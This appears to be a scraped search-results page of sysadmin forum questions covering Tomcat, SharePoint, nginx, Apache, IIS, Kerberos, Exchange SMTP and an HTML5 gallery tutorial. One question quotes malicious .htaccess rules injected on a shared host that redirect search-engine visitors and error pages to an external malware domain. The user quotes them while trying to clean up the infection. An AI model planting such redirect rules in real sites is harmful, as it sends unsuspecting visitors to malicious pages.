Search Results

Search found 62215 results on 2489 pages for 'http basic authentication'.

Page 316/2489 | < Previous Page | 312 313 314 315 316 317 318 319 320 321 322 323  | Next Page >

  • deploying war on tomcat fails to start

    - by Asghar
    i have a java application which uses JAX_WS when i deployed on my tomcat5 server . it is deployed successfully. but it fails to start SEVERE: WSSERVLET11: failed to parse runtime descriptor: java.lang.IllegalArgumentException: prefix cannot be "null" when creating a QName java.lang.IllegalArgumentException: prefix cannot be "null" when creating a QName at javax.xml.namespace.QName.<init>(xml-commons-apis-1.3.02.jar.so) at gnu.xml.stream.XMLParser.getAttributeName(libgcj.so.7rh) at com.sun.xml.ws.util.xml.XMLStreamReaderFilter.getAttributeName(XMLStreamReaderFilter.java:228) at com.sun.xml.ws.streaming.XMLStreamReaderUtil$AttributesImpl.<init>(XMLStreamReaderUtil.java:355) at com.sun.xml.ws.streaming.XMLStreamReaderUtil.getAttributes(XMLStreamReaderUtil.java:198) at com.sun.xml.ws.transport.http.DeploymentDescriptorParser.parseAdapters(DeploymentDescriptorParser.java:204) at com.sun.xml.ws.transport.http.DeploymentDescriptorParser.parse(DeploymentDescriptorParser.java:147) at com.sun.xml.ws.transport.http.servlet.WSServletContextListener.contextInitialized(WSServletContextListener.java:124) at org.apache.catalina.core.StandardContext.listenerStart(catalina-5.5.23.jar.so) at org.apache.catalina.core.StandardContext.start(catalina-5.5.23.jar.so) at org.apache.catalina.manager.ManagerServlet.start(catalina-manager-5.5.23.jar.so) at org.apache.catalina.manager.HTMLManagerServlet.start(catalina-manager-5.5.23.jar.so) at org.apache.catalina.manager.HTMLManagerServlet.doGet(catalina-manager-5.5.23.jar.so) at javax.servlet.http.HttpServlet.service(tomcat5-servlet-2.4-api-5.5.23.jar.so) at javax.servlet.http.HttpServlet.service(tomcat5-servlet-2.4-api-5.5.23.jar.so) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(catalina-5.5.23.jar.so) at org.apache.catalina.core.ApplicationFilterChain.doFilter(catalina-5.5.23.jar.so) at org.apache.catalina.core.StandardWrapperValve.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.core.StandardContextValve.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.core.StandardHostValve.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.valves.ErrorReportValve.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.core.StandardEngineValve.invoke(catalina-5.5.23.jar.so) at org.apache.catalina.connector.CoyoteAdapter.service(catalina-5.5.23.jar.so) at org.apache.coyote.http11.Http11Processor.process(tomcat-http-5.5.23.jar.so) at org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(tomcat-http-5.5.23.jar.so) at org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(tomcat-util-5.5.23.jar.so) at org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(tomcat-util-5.5.23.jar.so) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(tomcat-util-5.5.23.jar.so) at java.lang.Thread.run(libgcj.so.7rh)

    Read the article

  • SharePoint, Exchange and Incoming Emails Without Directory Management Services

    - by Nariman
    Trying to keep this as simple as possible. We've already created the email accounts that we need (e.g. account[1-20]@domain.com) on Exchange/AD. We'd like to now enable incoming emails on SharePoint 2007 lists corresponding to these accounts. My thinking is we don’t need to configure Directory Management Services [2] – the architecture will be simpler without it and the application doesn’t require these services. However, we still need to route messages from Exchange to either local SMTP services (via the connector described in the articles below) or by user-specific drop-folder settings (if permitted by Exchange). So the question is: can we instruct Exchange to use a drop folder just for accounts account[1-20]@domain.com? or do we need to change the accounts to account[1-20]@sharepointsmtp.domain.com and re-route those message to the local SMTP service that will drop them on disk? I've read the material below. [1] - http://www.combined-knowledge.com/Downloads/2007/How%20to%20configure%20Email%20Enabled%20Lists%20in%20Moss2007%20RTM%20using%20Exchange%202007.pdf http://social.msdn.microsoft.com/Forums/en/sharepointdevelopment/thread/91e0c3d2-afe6-469d-b1bc-6ae7a9aa287e http://gj80blogtech.blogspot.com/2009/12/configure-incoming-email-setting-in.html http://www.jasonslater.co.uk/2007/08/10/configuring-incoming-mail-on-moss-2007-and-exchange-2007/ http://technet.microsoft.com/en-us/library/cc262947%28office.12%29.aspx http://technet.microsoft.com/en-us/library/cc263260%28office.12%29.aspx [2] – http://graycloud.com/sharepoint/incoming-mail-configuration-what-permissions-are-require-t39483.html

    Read the article

  • Davical + LDAP + NTLM

    - by slavizh
    I have set up a Davical server on CentOS. I've configured it to use LDAP and the users use their usernames and passwords to authenticate to the Davical server. I am using Lightning as client software for calendaring. Using Lightning requires entering username and password everytime, so I decided to set NTLM. I want my users who are logging in the domain to use the calendar server trough Lightning without entering username and password. I've set up NTLM on the Davical server. But when a user trys to reach the calendar trough Lightning first the server asks for NTLM username and password and then ask for the LDAP username and password. It becomes something like double authentication. The problem is that NLTM requires domain\username and passowrd and Davical trough LDAP requires only username and password. So my questions are: Is there a way to change something in Davical so that Davical trough LDAP to requires domain\username and passwords authentication? That way may be trough NTLM the second authentication will proceed silently and the users will user Lightning without entering usernames and passwords Is there a way I can make this double authentication to become one and to use only NTLM? P.S. We have Samba domain with LDAP server and our users use Thunderbird for their mail and I want to put Lightning too. That way they will have calendar service. But I don't want they to enter username and password for the calendar every time they log in. I know they can save that password but that is not an option for my organization.

    Read the article

  • Service nginx reload: unexpected error

    - by Anna
    I'm trying to install wordpress on my nginx server by following this tutorial: http://premium.wpmudev.org/blog/how-to-setup-your-own-nginx-powered-wordpress-server/ However, the last command at step 7 gave me a strange error: service nginx reload A copy-paste from my terminal: root@server:~# service nginx reload Reloading nginx configuration: nginx: [emerg] unexpected "o" in /etc/nginx/sites-enabled/wordpress:7 nginx: configuration file /etc/nginx/nginx.conf test failed When I nano into sites-enabled/wordpress, on the 7th line I can't find anything strange: <!DOCTYPE html> <html class=" "> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# object: http://ogp.me/ns/object# article: http://ogp.me/ns/article# profile: http://ogp.me/ns/profile#"> <meta charset='utf-8'> <meta http-equiv="X-UA-Compatible" content="IE=edge"> Also, I don't see any obvious errors in my nginx.conf file, but maybe I'm not checking something? The first couple of lines of the nginx config file: user www-data; worker_processes 4; pid /var/run/nginx.pid; events { worker_connections 768; # multi_accept on; } Any help is appreciated, thanks a lot in advance!

    Read the article

  • "could not find suitable fingerprints matched to available hardware" error

    - by Alex
    I have a thinkpad t61 with a UPEK fingerprint reader. I'm running ubuntu 9.10, with fprint installed. Everything works fine (I am able to swipe my fingerprint to authenticate any permission dialogues or "sudo" prompts successfully) except for actually logging onto my laptop when I boot up or end my session. I receive an error below the gnome login that says "Could not locate any suitable fingerprints matched to available hardware." What is causing this? here are the contents of /etc/pam.d/common-auth file # # /etc/pam.d/common-auth - authentication settings common to all services # # This file is included from other service-specific PAM config files, # and should contain a list of the authentication modules that define # the central authentication scheme for use on the system # (e.g., /etc/shadow, LDAP, Kerberos, etc.). The default is to use the # traditional Unix authentication mechanisms. # # As of pam 1.0.1-6, this file is managed by pam-auth-update by default. # To take advantage of this, it is recommended that you configure any # local modules either before or after the default block, and use # pam-auth-update to manage selection of other modules. See # pam-auth-update(8) for details. # here are the per-package modules (the "Primary" block) auth sufficient pam_fprint.so auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds auth requisite pam_deny.so # prime the stack with a positive return value if there isn't one already; # this avoids us returning an error just because nothing sets a success code # since the modules above will each just jump around auth required pam_permit.so # and here are more per-package modules (the "Additional" block) auth optional pam_ecryptfs.so unwrap # end of pam-auth-update config #auth sufficient pam_fprint.so #auth required pam_unix.so nullok_secure

    Read the article

  • setting up tracd behind mod_proxy?

    - by FilmJ
    I'm having trouble setting up mod_proxy and tracd. Seems almost all the search results for this problem take me to the built-in trac documentation page that mentions it as an option. I have several VirtualServers already running on the box in question, so running tracd on port 80 or 443 is not an option, but I do want to make my trac server accessible on this machine without exposing an additional port via the firewall. Making things even more complicated is that I have multiple trac repositories being served by the same instance of tracd, and so I want to set it up so: http://trac.abc.com is proxy'd to localhost:8000/projects/abcproject, and http://trac.def.com is proxy'd to localhost:8000/projects/defproject. Currently, the setup I have below results in 100% 403 errors. The server is running as www-data and the directory where all trac files are stored is owned by www-data, AND tracd (as show below) is running as www-data, so not sure where it's getting hung up. The relevant configuration on /var/apache2/sites-enabled/trac.abc.com: ProxyPass / http://localhost:8000/abcproject ProxyPassReverse / http://localhost:8000/abcproject The relevant configuration on /var/apache2/sites-enabled/trac.def.com: ProxyPass / http://localhost:8000/defproject ProxyPassReverse / http://localhost:8000/defproject The command used to instantiate tracd: tracd -a defproject,/var/www/vhosts/trac-common/users.htdigest,DEFProject -a abcproject,/var/www/vhosts/trac-common/users.htdigest,ABCProject -p 8000 -b localhost -e /var/www/vhosts/trac-common/projects If I access the site at http://localhost:8000/ everything works fine, but if I try to access via any of the proxy'd hosts I end up with 403 at every turn. I've used mod_proxy successfully as described above for other servers, such as couchdb, so maybe this has to do with the headers sent by tracd??

    Read the article

  • Redirecting a single request to another pages, ignoring www subdomain

    - by Petter Brodin
    I have a site running on IIS 7.5 that does an automatic redirect from 'http://mysite.com/whatever.aspx' to 'http://www.mysite.com/whatever.aspx' On the site, there is a lot of traffic to an old URL that I want to redirect to the front page, index.aspx: 'http://mysite.com/foo/bar/index.cgi%something=asdf&somethingelse=qwerty' The problem is that no matter what I try, I can only get the redirect to work with the www subdomain. If I use the URL without www, I just end up at 'http://www.mysite.com/404.aspx' Any ideas? Thanks in advance for all help! Edit3: it seems like the browser caching the redirect response was messing with me, so edit2 is wrong. See my response below. Edit2: disregard edit1, it doesn't seem like it's working after all. Edit: here's some further info: using this article I've managed to redirect from 'http://mysite.com/foo/bar/index.cgi' to 'http://www.mysite.com/index.aspx', but if I add the query string parameters, it still redirects to 'http://www.mysite.com/404.aspx' Isn't there a way to catch all requests to the cgi file, including query string parameters?

    Read the article

  • Wordpress Forbidden page

    - by ffffff
    HTML without a body part is null If I read preview mode in (there is no authority) without logging in The response html is this.. <html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja"> <head profile="http://purl.org/net/ns/metaprof"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta name="generator" content="WordPress 2.9.2" /> <meta name="author" content="blog" /> <link rel="alternate" type="application/atom+xml" href="http://blog.example.com/feed/atom/" title="Atom cite contents" /> <link rel="start" href="http://blog.example.com" title="blog Home" /> <link rel="stylesheet" type="text/css" href="http://blog.example.com/wp-content/themes/blog/style.css" /> <meta name="description" content="blog" /> <title>blog - </title> </head> <body class="individual single"> </div> </body> </html> Do you have any solutions?

    Read the article

  • How can I upgradge from Ubuntu Intrepid Ibex 8.10 to Jaunty 9.04 when old-releases no longer has the necessary packages?

    - by tommy chheng
    I changed my sources.list to: deb http://old-releases.ubuntu.com/ubuntu/ intrepid main restricted universe multiverse deb http://old-releases.ubuntu.com/ubuntu/ intrepid-updates main restricted universe multiverse deb http://old-releases.ubuntu.com/ubuntu/ intrepid-security main restricted universe multiverse I tried installing sudo apt-get install update-manager-core but i get this error: 1 upgraded, 3 newly installed, 0 to remove and 40 not upgraded. Need to get 2506kB/2555kB of archives. After this operation, 4346kB of additional disk space will be used. Do you want to continue [Y/n]? Y Err http://old-releases.ubuntu.com intrepid-updates/main update-manager-core 1:0.93.34 404 Not Found Err http://old-releases.ubuntu.com intrepid-security/main dpkg 1.14.20ubuntu6.3 404 Not Found Failed to fetch http://old-releases.ubuntu.com/ubuntu/pool/main/d/dpkg/dpkg_1.14.20ubuntu6.3_amd64.deb 404 Not Found Failed to fetch http://old-releases.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.93.34_amd64.deb 404 Not Found E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing? Running apt-get update or --fix-missing returns the same errors. How can I successfully upgrade from Intrepid Ibex to Jaunty 9.04?

    Read the article

  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting for one of my clients. The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added: IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L] </IfModule> and on the bottom: ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8 The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root. I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control. This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?

    Read the article

  • Redirect from folder containing website

    - by Sam
    I have a website reached from this url: http://www.mysite.com/cms/index.php being served from this directory: public_html/cms/index.php In public_html I have this .htaccess RewriteRule (.*) cms/$1 [L] Which lets me get to the site like this: http://www.mysite.com/index.php But now if I reference the 'old' address, I'd like to redirect to the rewritten address with a permanent redirect code. for example: http://www.mysite.com/cms/?q=node/1 is redirected to... http://www.mysite.com/?q=node/1 How can I make this happen? EDIT: Also in the .htaccess file supplied with Drupal(cms), this is written. I've tried enabling it, but it doesn't seem to have any effect. # Modify the RewriteBase if you are using Drupal in a subdirectory or in a # VirtualDocumentRoot and the rewrite rules are not working properly. # For example if your site is at http://example.com/drupal uncomment and # modify the following line: # RewriteBase /drupal EDIT: Including more of my .htaccess file - seems relevant. # Block access to "hidden" directories whose names begin with a period. RewriteRule "(^|/)\." - [F] #Strip cms folder from url RewriteRule (.*) cms/$1 RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !=/favicon.ico RewriteRule ^ index.php [L] # Rules to correctly serve gzip compressed CSS and JS files. # Requires both mod_rewrite and mod_headers to be enabled. <IfModule mod_headers.c> # Serve gzip compressed CSS files if they exist and the client accepts gzip. RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.css $1\.css\.gz [QSA] # Serve gzip compressed JS files if they exist and the client accepts gzip. RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.js $1\.js\.gz [QSA] # Serve correct content types, and prevent mod_deflate double gzip. RewriteRule \.css\.gz$ - [T=text/css,E=no-gzip:1] RewriteRule \.js\.gz$ - [T=text/javascript,E=no-gzip:1] <FilesMatch "(\.js\.gz|\.css\.gz)$"> # Serve correct encoding type. Header append Content-Encoding gzip # Force proxies to cache gzipped & non-gzipped css/js files separately. Header append Vary Accept-Encoding </FilesMatch>

    Read the article

  • Host couldn't be reached by domain name, only by IP: Apache's fault?

    - by MaxArt
    I have this Windows Server 2003 R2 32 bit machine running Apache 2.4.2 with OpenSSL 1.0.1c and PHP 5.4.5 via mod_fcgid 2.3.7. This config worked just fine for some hours, but then the site couldn't be reached with its domain name, say www.example.com, but it could be still reached by its IP address. In particular, while https://www.example.com/ yielded a connection error, http://123.1.2.3/ worked just fine. Yes, first https then http. Error and access logs were clean, i.e. they showed no signs of problems. Just the usual messages, that were interrupted while the site couldn't be reached. After some investigation, a simple restart of Apache solved the problem. Unfortunately, I didn't have the chance to test if https://123.1.2.3/ worked as well, or if http://www.example.com/ was still redirected to https as usual. So, has anyone have any idea of what happened? Before I get tired of Apache and ditch it in favor of Nginx? Edit: Some log informations. The last line of sslerror.log is from 90 minutes before the problem occurred, so I guess it's not important. ssl_request.log shows nothing interesting, too: these are the last two lines before the problem: [28/Aug/2012:17:47:54 +0200] x.x.x.x TLSv1.1 ECDHE-RSA-AES256-SHA "GET /login HTTP/1.1" 1183 [28/Aug/2012:17:47:45 +0200] y.y.y.y TLSv1 ECDHE-RSA-AES256-SHA "POST /upf HTTP/1.1" 73 The previous lines are all the same and don't seem interesting, except 4 lines like these 30-40 seconds before the problem: [28/Aug/2012:17:47:14 +0200] z.z.z.z TLSv1 ECDHE-RSA-AES256-SHA "-" - These are the corrisponding lines from sslaccess.log: z.z.z.z - - [28/Aug/2012:17:47:14 +0200] "-" 408 - ... x.x.x.x - - [28/Aug/2012:17:47:54 +0200] "GET /login HTTP/1.1" 200 1183 y.y.y.y - - [28/Aug/2012:17:47:45 +0200] "POST /upf HTTP/1.1" 200 73

    Read the article

  • Reset rc.d so software starts at boot again

    - by natli
    I ran the following 2 commands on my VPS box and now it boots without starting any software at all. According to rcconf it's still supposed to start my chosen software (ssh etc.) but it doesn't. update-rc.d vz defaults update-rc.d vzeventd defaults I already tried removing them again with update-rc.d -f vz remove update-rc.d -f vzeventd remove But that didnt't change anything. /etc/rc.local also still correctly lists some scripts I want to run at start-up, but they don't seem to be called either. I expect the top 2 commands to be responsible, but here's everything I did: mkdir /var/openvz-dl cd /var/openvz-dl wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-2.6.32-042stab062.2.x86_64.rpm wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-devel-2.6.32-042stab062.2.x86_64.rpm wget http://download.openvz.org/utils/vzctl/4.0/vzctl-4.0-1.x86_64.rpm wget http://download.openvz.org/utils/vzctl/4.0/vzctl-core-4.0-1.x86_64.rpm wget http://download.openvz.org/utils/ploop/1.5/ploop-1.5-1.x86_64.rpm wget http://download.openvz.org/utils/ploop/1.5/ploop-lib-1.5-1.x86_64.rpm wget http://download.openvz.org/utils/vzquota/3.1/vzquota-3.1-1.x86_64.rpm apt-get install fakeroot alien fakeroot alien --to-deb --scripts --keep-version vz*.rpm ploop*.rpm dpkg -i vz*.deb ploop*.deb --force-overwrite update-rc.d vz defaults update-rc.d vzeventd defaults reboot A huge part of that failed because I was running it on an OpenVZ VPS which has a shared kernel that can't be altered, so I also had to fix the dpkg like so (it was moaning about wanting to install vzkernel with a package not being found); rm /var/lib/dpkg/info/vzkernel* dpkg-reconfigure vzkernel --force dpkg --purge --force-all vzkernel But that didn't fix the boot issue either. How do I make my software start at boot again?

    Read the article

  • Loadbalancing with nginx and tomcat

    - by London
    Hello this should be fairly easy to answer for any system admin, the problem is that I'm not server admin but I have to complete this task, I'm very close but still not managing to do it. Here is what I mean, I have two tomcat instance running on machine1 and machine2. People usually access those by visiting urls : http://machine1:8080/appName http://machine2:9090/appName The problem is when I setup nginx with domain name i.e domain.com, nginx sends requests to http://machine1:8080/ and http://machine2:9090/ instead of http://machine1:8080/ and http://machine2:9090/appName Here is my configuration (very basic as it can be noted) : upstream backend { server machine1:8080; server machine2:9090; } server { listen 80; server_name www.mydomain.com mydomain.com; location / { # needed to forward user's IP address to rails proxy_set_header X-Real-IP $remote_addr; # needed for HTTPS proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $http_host; proxy_redirect off; proxy_max_temp_file_size 0; proxy_pass http://backend; } #end location } #end server What changes must I do to do the following : - when user visits mydomain.com - transfer him to either machine1:8080/appName or machine2:9090 Thank you

    Read the article

  • Removing HttpModule for specific path in ASP.NET / IIS 7 application?

    - by soccerdad
    Most succinctly, my question is whether an ASP.NET 4.0 app running under IIS 7 integrated mode should be able to honor this portion of my Web.config file: <location path="auth/windows"> <system.webServer> <modules> <remove name="FormsAuthentication"/> </modules> </system.webServer> </location> I'm experimenting with mixed mode authentication (Windows and Forms). Using IIS Manager, I've disabled Anonymous authentication to auth/windows/winauth.aspx, which is within the location path above. I have Failed Request Tracing set up to trace various HTTP status codes, including 302s. When I request the winauth.aspx page, a 302 HTTP status code is returned. If I look at the request trace, I can see that a 401 (unauthorized) was originally generated by the AnonymousAuthenticationModule. However, the FormsAuthenticationModule converts that to a 302, which is what the browser sees. So it seems as though my attempt to remove that module from the pipeline for pages in that path isn't working. But I'm not seeing any complaints anywhere (event viewer, yellow pages of death, etc.) that would indicate it's an invalid configuration. I want the 401 returned to the browser, which presumably would include an appropriate WWW-Authenticate header. A few other points: a) I do have <authentication mode="Forms"> in my Web.config, and that is what the 302 redirects to; b) I got the "name" of the module I'm trying to remove from the inetserv\config\applicationHost.config file; c) I have this element in my Web.config file: <modules runAllManagedModulesForAllRequests="false">; d) I tried a <location> element for the path in which I set the authentication mode to "None", but that gave a yellow exception page that the property can't be set below the application level. Anyone had any luck removing modules in this fashion?

    Read the article

  • Exchange 2010: Send emails via STMP with custom From address to outside the domain

    - by marsze
    The requirement(s): (1) Connect to Exchange via STMP and (2) basic authentication and send emails with a (3) custom From address to (4) recipients outside the domain. I was able to get (1) - (3) working. I created a dedicated receive connector for this task and configured it like this: Permissions: ms-Exch-SMTP-Accept-Any-Recipient (for authenticated users) ms-Exch-SMTP-Accept-Authoritative-Domain-Sender (for authenticated users) ms-Exch-SMTP-Accept-Any-Sender (for authenticated users) Authentication: TLS Basic Authentication (without TLS) Exchange Server Authentication However, I'm still struggeling with (4): I can send with "fake" From addresses to recipients inside the domain. Also, I can send with the original From address to recipients outside the domain. Can you tell me what I'm missing, to configure Exchange to send emails with changed From addresses to recipients outside the domain? (Or is this even possible at all?) Thanks. UPDATE I have to correct myself: it seems to be working after all. There must be some issue with the mailbox I used for testing. It turned out it's working with other external mailboxes. However, I still have no idea what was different there... Anyways, you can take this as a documentation on how to configure Exchange in such a way ;)

    Read the article

  • How to access Virtual machine using powershell script

    - by Sheetal
    I want to access the virtual machine using powershell script. For that I used below script, Enter-PSSession -computername sheetal-VDD -credential compose04.com\abc.xyz1 where, sheetal-VDD is hostname of virtual machine compose04.com is the domain name of virtual machine and abc.xyz1 is the username of virtual machine After entering above command , it asks for password. When the password is entered I get below error, Enter-PSSession : Connecting to remote server failed with the following error message : WinRM cannot process the reques t. The following error occured while using Kerberos authentication: There are currently no logon servers available to s ervice the logon request. Possible causes are: -The user name or password specified are invalid. -Kerberos is used when no authentication method and no user name are specified. -Kerberos accepts domain user names, but not local user names. -The Service Principal Name (SPN) for the remote computer name and port does not exist. -The client and remote computers are in different domains and there is no trust between the two domains. After checking for the above issues, try the following: -Check the Event Viewer for events related to authentication. -Change the authentication method; add the destination computer to the WinRM TrustedHosts configuration setting or us e HTTPS transport. Note that computers in the TrustedHosts list might not be authenticated. -For more information about WinRM configuration, run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic. At line:1 char:16 + Enter-PSSession <<<< -computername sheetal-VDD -credential compose04.com\Sheetal.Varpe + CategoryInfo : InvalidArgument: (sheetal-VDD:String) [Enter-PSSession], PSRemotingTransportException + FullyQualifiedErrorId : CreateRemoteRunspaceFailed Can someone help me out in this?

    Read the article

  • Slow loading Magento Commerce homepage

    - by Matt
    I have recently changed by website and it is really loading slowly :- dancemidisamples.com here is a report http://www.webpagetest.org/result/120906_78_ANK/ As far as I can tell the is a issue with this section of code <link rel="icon" href="http://www.dancemidisamples.com/skin/frontend/base/default /favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="http://www.dancemidisamples.com/skin/frontend/base/default/favicon.ico" type="image/x-icon" /> <script type="text/javascript"> //<![CDATA[ var urlSkinsite='http://www.dancemidisamples.com/skin/frontend/em0040/default/'; //]]> </script> <!--[if lt IE 7]> <script type="text/javascript"> //<![CDATA[ var BLANK_URL = 'http://www.dancemidisamples.com/js/blank.html'; var BLANK_IMG = 'http://www.dancemidisamples.com/js/spacer.gif'; //]]> </script> <![endif]--> Does anyone have any ideas, people have told me it my DNS but it has a 49ms response rate according to http://www.webpagetest.org/result/120906_78_ANK/1/details/cached/ We are hosted with rackspace so I dont see how it could be the server. Its a dedicated server not cloud hosted

    Read the article

  • Let varnish send old data from cache while it's fetching a new one?

    - by mark
    I'm caching dynamically generated pages (PHP-FPM, NGINX) and have varnish in front of them, this works very well. However, once the cache timeout is reached, I see this: new client requests page varnish recognizes the cache timeout client waits varnish fetches new page from backend varnish delivers new page to the client (and has page cached, too, for the next request which gets it instantly) What I would like to do is: client requests page varnish recognizes the timeout varnish delivers old page to the client varnish fetches new page from backend and puts it into the cache In my case it's not site where outdated information is such a big problem, especially not when we're talking about cache timeout from a few minutes. However, I don't want punish user to wait in line and rather deliver something immediate. Is that possible in some way? To illustrate, here's a sample output of running siege 5 minutes against my server which was configured to cache for one minute: HTTP/1.1,200, 1.97, 12710,/,1,2013-06-24 00:21:06 ... HTTP/1.1,200, 1.88, 12710,/,1,2013-06-24 00:21:20 ... HTTP/1.1,200, 1.93, 12710,/,1,2013-06-24 00:22:08 ... HTTP/1.1,200, 1.89, 12710,/,1,2013-06-24 00:22:22 ... HTTP/1.1,200, 1.94, 12710,/,1,2013-06-24 00:23:10 ... HTTP/1.1,200, 1.91, 12709,/,1,2013-06-24 00:23:23 ... HTTP/1.1,200, 1.93, 12710,/,1,2013-06-24 00:24:12 ... I left out the hundreds of requests running in 0.02 or so. But it still concerns me that there are going to be users having to wait almost 2 seconds for their raw HTML. Can't we do any better here? (I came across Varnish send while cache , it sounded similar but not exactly what I'm trying to do.)

    Read the article

  • Mac Outlook showing all links in smart quotes?

    - by user2727128
    I was given the task of fixing my friend's email today and really don't know what the problem is. When an email is sent from his laptop (Mac) from Outlook the email address link in the signature shows exactly like this: [email protected]<mailto:[email protected]>. Additionally the website link displays like this: www.website.com<http://www.website.com>. And lastly, the image comes through as cid:randomstringofnumbers. When I sent him an email and he sent one back it converted my signature to same weird formatting. Plus, even in the header where it shows our emails, they are displaying the same way: [email protected]<mailto:[email protected]>. And the weirdest thing is that this problem seems to be "compounding". So when I scroll down to the last, most recent email in the thread I see this www.website.com<http://www.website.com> next email shows this: www.website.com<http://www.website.com><http://www.website.com> and the next this: www.website.com<http://www.website.com><http://www.website.com><http://www.website.com> This is happening to the emails too, everywhere. I'm thinking this might be something to do with smart quotes and the auto formatting but I'm not sure. Could this be the problem? And if so how do I fix it?

    Read the article

  • TGT validation fails, but only for one user

    - by wzzrd
    I'm seeing the weirdest thing here. I have a couple of RHEL3, 4 and 5 machines that validate user credentials through Kerberos with an Active Directoy domain controller as their KDC. This works for all of my users, save one. There is one account that is unable to log into RHEL3 Linux machines and generates the following errors there: May 31 13:53:19 mybox sshd(pam_unix)[7186]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.0.1 user=user May 31 13:53:20 mybox sshd[7186]: pam_krb5: TGT verification failed for `user' May 31 13:53:20 mybox sshd[7186]: pam_krb5: authentication fails for `user' Other accounts, like my own, are fine: May 31 17:25:30 mybox sshd(pam_unix)[12913]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.0.1 user=myuser May 31 17:25:31 mybox sshd[12913]: pam_krb5: TGT for myuser successfully verified May 31 17:25:31 mybox sshd[12913]: pam_krb5: authentication succeeds for `myuser' May 31 17:25:31 mybox sshd(pam_unix)[12915]: session opened for user myuser by (uid=0) As you can see, TGT validation fails. This only happens for this specific account, not for any other. The failing useraccount's password has been reset, I inspected both user objects in Active Directory, but I see nothing out of the ordinary. If I have the failing useraccount log into a RHEL4 or 5 box, there is not problem, so it must be RHEL3 specific, but the fact that only one account suffers from this, alludes me. Maybe someone has seen this before?

    Read the article

  • Creating a multi-column rollover image gallery with HTML 5

    - by nikolaosk
    I know it has been a while since I blogged about HTML 5. I have two posts in this blog about HTML 5. You can find them here and here.I am creating a small content website (only text,images and a contact form) for a friend of mine.He wanted to create a rollover gallery.The whole concept is that we have some small thumbnails on a page, the user hovers over them and they appear enlarged on a designated container/placeholder on a page. I am trying not to use Javascript scripts when I am using effects on a web page and this is what I will be doing in this post.  Well some people will say that HTML 5 is not supported in all browsers. That is true but most of the modern browsers support most of its recommendations. For people who still use IE6 some hacks must be devised.Well to be totally honest I cannot understand why anyone at this day and time is using IE 6.0.That really is beyond me.Well, the point of having a web browser is to be able to ENJOY the great experience that the WE? offers today.  Two very nice sites that show you what features and specifications are implemented by various browsers and their versions are http://caniuse.com/ and http://html5test.com/. At this times Chrome seems to support most of HTML 5 specifications.Another excellent way to find out if the browser supports HTML 5 and CSS 3 features is to use the Javascript lightweight library Modernizr.In this hands-on example I will be using Expression Web 4.0.This application is not a free application. You can use any HTML editor you like.You can use Visual Studio 2012 Express edition. You can download it here. In order to be absolutely clear this is not (and could not be ) a detailed tutorial on HTML 5. There are other great resources for that.Navigate to the excellent interactive tutorials of W3School.Another excellent resource is HTML 5 Doctor.For the people who are not convinced yet that they should invest time and resources on becoming experts on HTML 5 I should point out that HTML 5 websites will be ranked higher than others. Search engines will be able to locate better the content of our site and its relevance/importance since it is using semantic tags. Let's move now to the actual hands-on example. In this case (since I am mad Liverpool supporter) I will create a rollover image gallery of Liverpool F.C legends. I create a folder in my desktop. I name it Liverpool Gallery.Then I create two subfolders in it, large-images (I place the large images in there) and thumbs (I place the small images in there).Then I create an empty .html file called LiverpoolLegends.html and an empty .css file called style.css.Please have a look at the HTML Markup that I typed in my fancy editor package below<!doctype html><html lang="en"><head><title>Liverpool Legends Gallery</title><meta charset="utf-8"><link rel="stylesheet" type="text/css" href="style.css"></head><body><header><h1>A page dedicated to Liverpool Legends</h1><h2>Do hover over the images with the mouse to see the full 